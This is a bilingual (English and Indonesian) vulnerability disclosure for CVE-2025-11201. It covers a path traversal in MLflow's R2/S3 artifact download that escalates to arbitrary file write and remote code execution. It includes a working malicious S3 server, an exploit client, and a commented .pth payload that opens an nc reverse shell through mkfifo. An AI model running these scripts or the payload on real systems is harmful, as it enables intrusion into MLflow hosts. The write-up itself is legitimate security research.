CVE-2025-11201 Arbitrary File Write → Remote Code Execution in MLflow

Written by Muhammad Fadilullah Dzaki (@0xboyz)

Story

One afternoon, I was checking out MLflow's artifact implementation, just to see how they supported remote storage, when a small detail caught my eye: the way MLflow fetches artifacts from an S3-like endpoint is more flexible than is safe. That flexibility ultimately opens the door to one serious vector: sneaking files to arbitrary paths on the target host while MLflow is downloading artifacts. With a few strings attached, this can escalate into Remote Code Execution (RCE). Below, I recount the discovery, outlining the technical mechanism, why it's dangerous for the ML supply chain, and how it could be exploited.

A brief background on MLflow, artifacts, and boto3

MLflow provides an artifact mechanism for storing models and related assets. When the artifact source points to an S3-like provider, MLflow uses a common Python client to read the object list and download the required objects. In many deployments, boto3 is already installed, sometimes by MLflow itself, sometimes due to other dependencies, and local AWS credentials often exist on the developer host or container.

Vulnerable functions root cause full code blocks

Below are the exact functions inspected as present before patch:

def parse_s3_compliant_uri(self, uri): # r2 uri format(virtual): r2://<bucket-name>@<account-id>.r2.cloudflarestorage.com/<path> parsed = urlparse(uri) if parsed.scheme != "r2": raise Exception(f"Not an R2 URI: {uri}") host = parsed.netloc path = parsed.path bucket = host.split("@")[0] if path.startswith("/"): path = path[1:] return bucket, path @staticmethod def convert_r2_uri_to_s3_endpoint_url(r2_uri): host = urlparse(r2_uri).netloc host_without_bucket = host.split("@")[-1] return f"https://{host_without_bucket}"

def list_artifacts(self, path=None): artifact_path = self.bucket_path dest_path = self.bucket_path if path: dest_path = posixpath.join(dest_path, path) infos = [] prefix = dest_path + "/" if dest_path else "" s3_client = self._get_s3_client() paginator = s3_client.get_paginator("list_objects_v2") results = paginator.paginate(Bucket=self.bucket, Prefix=prefix, Delimiter="/") for result in results: # Subdirectories will be listed as "common prefixes" due to the way we made the request for obj in result.get("CommonPrefixes", []): subdir_path = obj.get("Prefix") self._verify_listed_object_contains_artifact_path_prefix( listed_object_path=subdir_path, artifact_path=artifact_path ) subdir_rel_path = posixpath.relpath(path=subdir_path, start=artifact_path) if subdir_rel_path.endswith("/"): subdir_rel_path = subdir_rel_path[:-1] infos.append(FileInfo(subdir_rel_path, True, None)) # Objects listed directly will be files for obj in result.get("Contents", []): file_path = obj.get("Key") self._verify_listed_object_contains_artifact_path_prefix( listed_object_path=file_path, artifact_path=artifact_path ) file_rel_path = posixpath.relpath(path=file_path, start=artifact_path) file_size = int(obj.get("Size")) infos.append(FileInfo(file_rel_path, False, file_size)) return sorted(infos, key=lambda f: f.path)

Root cause analysis

Two related weaknesses combine to create the issue:

URI parsing & endpoint trust R2 URIs were converted to HTTPS endpoints without strict hostname validation, enabling attacker-controlled endpoints to serve malicious listings.

Path handling logic remote Keys were validated with a string prefix check and passed into posixpath.relpath(), but the code never confirmed the resulting path stays within the artifact root.

Why this is exploitable

posixpath.relpath() alone is not a security boundary it returns a textual relative path. If an attacker supplies a Key with many ../ segments, the resulting relative path, when joined to a local artifact root and written without canonicalization (os.path.realpath), can land outside the intended directory. A simple string-based prefix check can be bypassed by inserting traversal sequences that still pass naive prefix tests.

The core of the vulnerability

MLflow processes the list of artifact listings and paths returned by the S3-like endpoint without ensuring that the object name key does not contain a path traversal segment (../..), which could cause the target path in the filesystem to be outside the allowed artifact directory. If an attacker controls the S3-like host, they can direct MLflow to download an object and write it to arbitrary locations on the host, including sensitive locations, which could escalate to RCE.

Exploitation

Server.py

from flask import Flask, request # Configure payload file file_path = '../../../../../../../../../../tmp/this_is_payload' file_contents = 'You have been Hacked' # For RCE testing, enable the following lines: #file_path = '../../../../../../../../usr/local/lib/python3.10/site-packages/random.pth' #file_contents = ( # "import os; os.system('rm /tmp/f;mkfifo /tmp/f;" # "cat /tmp/f|sh -i 2>&1|nc 10.10.10.10 9001 >/tmp/f');" # ) app = Flask(__name__) @app.route("/") def s3_handler(domain): if 'location' in request.args: return ( '\n' '' 'region-code' ) if 'list-type' in request.args: return ( f'\n' '\n' ' unused\n' ' unused\n' ' 1\n' ' 1000\n' ' /\n' ' false\n' ' url\n' ' \n' f' a/b/c/d/e/f/g/{file_path}\n' ' 2024-02-13T16:34:20.000Z\n' ' "d41d8cd98f00b204e9800998ecf8427e"\n' ' 123\n' ' STANDARD\n' ' \n' '' ) return 'fallback' @app.route("//") def file_response(domain, filepath): return file_contents if __name__ == "__main__": app.run(host="0.0.0.0", port=4444)

exploit.py

import requests class MLFlowExploit: """Proof-of-Concept for model artifact abuse via crafted source path. PoC eksploitasi artefak model dengan path sumber yang dimanipulasi. """ def __init__(self, target_url, attacker_host, model_id): self.api = target_url self.attacker = attacker_host self.model = model_id self.session = requests.Session() def register_model(self): """Step 1: Register a new model / Daftarkan model baru""" endpoint = f"{self.api}/ajax-api/2.0/mlflow/registered-models/create" payload = {"name": self.model} response = self.session.post(endpoint, json=payload) print("Model Registration →", response.status_code, response.content) return response def create_version(self): """Step 2: Create model version with crafted source / Buat versi model dengan sumber yang dimodifikasi""" endpoint = f"{self.api}/ajax-api/2.0/mlflow/model-versions/create" crafted_source = f"r2://{self.attacker}/a/b/c/d/e/f/" payload = { "name": self.model, "source": crafted_source } response = self.session.post(endpoint, json=payload) print("Version Creation →", response.status_code, response.content) return response def fetch_artifact(self, version): """Step 3: Retrieve artifact from created version / Ambil artefak dari versi yang dibuat""" endpoint = f"{self.api}/model-versions/get-artifact" params = { "path": "g", "name": self.model, "version": version } response = self.session.get(endpoint, params=params) print("Artifact Retrieval →", response.status_code, response.content) return response # === Execution / Eksekusi === if __name__ == "__main__": exploit = MLFlowExploit( target_url="http://127.0.0.1:4444", attacker_host="3422-[...].ngrok-free.app", model_id="exp" ) exploit.register_model() version_response = exploit.create_version() version_id = version_response.json().get("model_version", {}).get("version") exploit.fetch_artifact(version_id)

Exploit Concept

Attacker controls or spoofs an R2/S3 endpoint.

The endpoint returns a listing containing Keys with traversal segments (e.g. a/b/../../../../tmp/pwned).

MLflow processes the listing, computes a relpath, and performs a write to the resolved path which outside the artifact root.

Attacker arranges the write to target an execution surface (Python .pth, plugin dir, rc files) to achieve RCE.

Impact

Severity: High CVSS 8.1

Vector: Network

Privileges: None required on target host to trigger write

Impact: Arbitrary file writes to Remote Code Execution

References

Source optimized_s3_artifact_repo.py lines 272–302 (GitHub)

Advisory / tracking: CVE-2025-11201 ZDI-25-931 (Zero Day Initiative)

© 2025 Muhammad Fadilullah Dzaki (@0xboyz) Responsible disclosure & security research

CVE-2025-11201 Arbitrary File Write → Remote Code Execution pada MLflow

Ditulis oleh Muhammad Fadilullah Dzaki (@0xboyz)

Cerita

Suatu sore saya sedang mengecek implementasi artefak di MLflow hanya ingin melihat bagaimana mereka mendukung storage “remote” ketika sebuah detail kecil menarik perhatian saya, cara MLflow mem-fetch artefak dari endpoint S3-like ternyata lebih fleksibel daripada yang aman. Fleksibilitas itu pada akhirnya membuka pintu untuk satu vektor serius, menyusupkan file ke path arbitrary di host target saat MLflow mengunduh artefak. Dengan sedikit rangkaian kondisi, hal ini dapat bereskalasi menjadi Remote Code Execution (RCE). Di bawah ini saya ceritakan perjalanan temuan itu, menguraikan mekanisme teknis, mengapa itu berbahaya untuk supply chain ML, dan Bagaimana ini bisa di exploitasi.

Latar belakang singkat MLflow, artefak, dan boto3

MLflow menyediakan mekanisme artefak untuk menyimpan model dan aset terkait. Ketika sumber artefak menunjuk ke penyedia S3-like, MLflow menggunakan klien Python umum untuk membaca daftar objek dan mengunduh objek yang diperlukan. Dalam banyak deployment, boto3 sudah terpasang kadang karena MLflow sendiri, kadang karena dependency lain dan kredensial AWS lokal sering ada di host developer atau container.

Fungsi rentan akar masalah blok kode lengkap

Berikut fungsi yang saya inspeksi sebelum patch:

def parse_s3_compliant_uri(self, uri): # r2 uri format(virtual): r2://<bucket-name>@<account-id>.r2.cloudflarestorage.com/<path> parsed = urlparse(uri) if parsed.scheme != "r2": raise Exception(f"Not an R2 URI: {uri}") host = parsed.netloc path = parsed.path bucket = host.split("@")[0] if path.startswith("/"): path = path[1:] return bucket, path @staticmethod def convert_r2_uri_to_s3_endpoint_url(r2_uri): host = urlparse(r2_uri).netloc host_without_bucket = host.split("@")[-1] return f"https://{host_without_bucket}"

def list_artifacts(self, path=None): artifact_path = self.bucket_path dest_path = self.bucket_path if path: dest_path = posixpath.join(dest_path, path) infos = [] prefix = dest_path + "/" if dest_path else "" s3_client = self._get_s3_client() paginator = s3_client.get_paginator("list_objects_v2") results = paginator.paginate(Bucket=self.bucket, Prefix=prefix, Delimiter="/") for result in results: # Subdirectories will be listed as "common prefixes" due to the way we made the request for obj in result.get("CommonPrefixes", []): subdir_path = obj.get("Prefix") self._verify_listed_object_contains_artifact_path_prefix( listed_object_path=subdir_path, artifact_path=artifact_path ) subdir_rel_path = posixpath.relpath(path=subdir_path, start=artifact_path) if subdir_rel_path.endswith("/"): subdir_rel_path = subdir_rel_path[:-1] infos.append(FileInfo(subdir_rel_path, True, None)) # Objects listed directly will be files for obj in result.get("Contents", []): file_path = obj.get("Key") self._verify_listed_object_contains_artifact_path_prefix( listed_object_path=file_path, artifact_path=artifact_path ) file_rel_path = posixpath.relpath(path=file_path, start=artifact_path) file_size = int(obj.get("Size")) infos.append(FileInfo(file_rel_path, False, file_size)) return sorted(infos, key=lambda f: f.path)

Analisis akar masalah

Dua kelemahan saling terkait menghasilkan masalah ini:

Parsing URI & kepercayaan endpoint URI R2 dikonversi menjadi endpoint HTTPS tanpa validasi hostname ketat, memungkinkan endpoint yang dikontrol penyerang mengirim listing berbahaya.

Logika penanganan path Key remote divalidasi dengan pengecekan prefix string lalu diproses dengan posixpath.relpath(), namun tidak ada konfirmasi bahwa path hasil tetap berada di dalam root artefak.

Mengapa ini dapat dieksploitasi?

posixpath.relpath() bukan batas keamanan ia hanya memberikan path relatif tekstual. Bila penyerang menyisipkan banyak ../ pada Key, path relatif yang dihasilkan saat digabungkan dengan root lokal dan ditulis tanpa canonicalization (os.path.realpath) bisa berada di luar direktori yang dimaksud. Validasi prefix berbasis string dapat dilewati dengan menyisipkan traversal yang tetap lolos pengecekan.

Inti kerentanan

MLflow memproses daftar objek listing & path artefak yang dikembalikan oleh endpoint S3-like tanpa memastikan bahwa Key nama objek tidak berisi segmen path traversal (../..) yang dapat membuat path target di filesystem keluar dari direktori artefak yang diizinkan. Bila attacker mengontrol host S3-like mereka dapat mengarahkan MLflow untuk mengunduh sebuah objek dan menuliskannya ke lokasi arbitrary di host termasuk lokasi sensitif yang memungkinkan eskalasi ke RCE.

Eksploitasi

server.py

from flask import Flask, request # Configure payload file file_path = '../../../../../../../../../../tmp/this_is_payload' file_contents = 'You have been Hacked' # For RCE testing, enable the following lines: #file_path = '../../../../../../../../usr/local/lib/python3.10/site-packages/random.pth' #file_contents = ( # "import os; os.system('rm /tmp/f;mkfifo /tmp/f;" # "cat /tmp/f|sh -i 2>&1|nc 10.10.10.10 9001 >/tmp/f');" # ) app = Flask(__name__) @app.route("/") def s3_handler(domain): if 'location' in request.args: return ( '\n' '' 'region-code' ) if 'list-type' in request.args: return ( f'\n' '\n' ' unused\n' ' unused\n' ' 1\n' ' 1000\n' ' /\n' ' false\n' ' url\n' ' \n' f' a/b/c/d/e/f/g/{file_path}\n' ' 2024-02-13T16:34:20.000Z\n' ' "d41d8cd98f00b204e9800998ecf8427e"\n' ' 123\n' ' STANDARD\n' ' \n' '' ) return 'fallback' @app.route("//") def file_response(domain, filepath): return file_contents if __name__ == "__main__": app.run(host="0.0.0.0", port=4444)

exploit.py

import requests class MLFlowExploit: """Proof-of-Concept for model artifact abuse via crafted source path. PoC eksploitasi artefak model dengan path sumber yang dimanipulasi. """ def __init__(self, target_url, attacker_host, model_id): self.api = target_url self.attacker = attacker_host self.model = model_id self.session = requests.Session() def register_model(self): """Step 1: Register a new model / Daftarkan model baru""" endpoint = f"{self.api}/ajax-api/2.0/mlflow/registered-models/create" payload = {"name": self.model} response = self.session.post(endpoint, json=payload) print("Model Registration →", response.status_code, response.content) return response def create_version(self): """Step 2: Create model version with crafted source / Buat versi model dengan sumber yang dimodifikasi""" endpoint = f"{self.api}/ajax-api/2.0/mlflow/model-versions/create" crafted_source = f"r2://{self.attacker}/a/b/c/d/e/f/" payload = { "name": self.model, "source": crafted_source } response = self.session.post(endpoint, json=payload) print("Version Creation →", response.status_code, response.content) return response def fetch_artifact(self, version): """Step 3: Retrieve artifact from created version / Ambil artefak dari versi yang dibuat""" endpoint = f"{self.api}/model-versions/get-artifact" params = { "path": "g", "name": self.model, "version": version } response = self.session.get(endpoint, params=params) print("Artifact Retrieval →", response.status_code, response.content) return response # === Execution / Eksekusi === if __name__ == "__main__": exploit = MLFlowExploit( target_url="http://127.0.0.1:4444", attacker_host="3241-[...].ngrok-free.app", model_id="exp" ) exploit.register_model() version_response = exploit.create_version() version_id = version_response.json().get("model_version", {}).get("version") exploit.fetch_artifact(version_id)

Konsep Eksploitasi

Penyerang mengendalikan atau memalsukan endpoint R2/S3.

Endpoint tersebut mengembalikan listing dengan Key yang berisi traversal (mis. a/b/../../../../tmp/malicious).

MLflow memproses listing, menghitung relpath, dan melakukan write ke path yang ter-resolve yang berada di luar root artefak.

Penyerang menargetkan lokasi eksekusi (mis. .pth, bashrc) untuk mendapatkan RCE.

Dampak

Severity: Tinggi CVSS 8.1

Vektor: Jaringan

Privileges: Tidak diperlukan pada host target untuk memicu penulisan

Dampak: Arbitrary file write → Remote Code Execution

Referensi

Source optimized_s3_artifact_repo.py lines 272–302 (GitHub)

Advisory / tracking: CVE-2025-11201 ZDI-25-931 (Zero Day Initiative)

© 2025 Muhammad Fadilullah Dzaki (@0xboyz) Responsible disclosure & security research